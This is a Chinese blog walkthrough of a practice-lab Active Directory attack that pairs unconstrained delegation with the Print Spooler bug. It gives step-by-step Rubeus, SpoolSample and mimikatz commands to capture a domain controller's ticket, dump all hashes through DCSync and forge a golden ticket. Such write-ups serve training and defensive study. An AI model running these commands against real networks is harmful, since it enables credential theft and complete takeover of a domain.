域渗透非约束委派&Spooler

文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

非约束委派&Spooler

这里我们利用非约束委派联合Spooler打印机的漏洞来进行演示;利用Rubeus来对域控ad1进行监听:作用就是当我们使用打印机服务强制让域控向12server2主机验证身份,Rubeus就可以监听到来自域控ad1的数据,从而截获域控的TGT;这里同样需要administrator权限去开启监听,使用域用户权限不足:
域用户下直接切换administrator权限命令如下:

runas /profile /user:12server2\administrator cmd.exe  #使用runas命令切换用户

在这里插入图片描述
使用Rubeus来对域控ad1进行监听:

Rubeus.exe monitor /interval:1 /filteruser:ad1$  #进行监听,当域控ad1访问域用户时,则会生成TGS。
SpoolSample.exe ad1 12server2 #利用打印机服务强制让域控ad1访问12server2

在这里插入图片描述
将保存下来的TGS使用 powershell 转到为正常的 TGT:

[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("得到的base64")) #利用脚本将得到的TGS生成TGT

在这里插入图片描述
将生成的凭证注入内存中:

Rubeus.exe ptt /ticket:base64  #利用Rubeus工具

使用mimikatz:

kerberos::ptt XXX.kirbi #导入凭证

从这里可以看出虽然票据已生成,但依然不能访问域控的文件:
在这里插入图片描述
这里我们生成的 TGT,相当于域控真正赋予了我们administrator本地管理员权限,所以这里我们就可以使用命令将krbtgt这个账号hash导出即可生成黄金票据,从而接管域控:

mimikatz.exe "lsadump::dcsync /domain:redteam.club /all /csv" "exit">log.txt

在这里插入图片描述
制作黄金票据,我们需要知道域用户的SID:

whoami /all #查询SID

在这里插入图片描述
构造黄金票据语句生成凭证:

kerberos::golden /domain:redteam.club /sid:S-1-5-21-2365300756-2663045586-4193326672 /krbtgt:b6e0fcce3106665064de4917394ccc27 /user:administrator /ticket:ntlm.kirbi
kerberos::ptt 凭证

将生成的凭证注入内存,成功访问域控的文件:
在这里插入图片描述

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值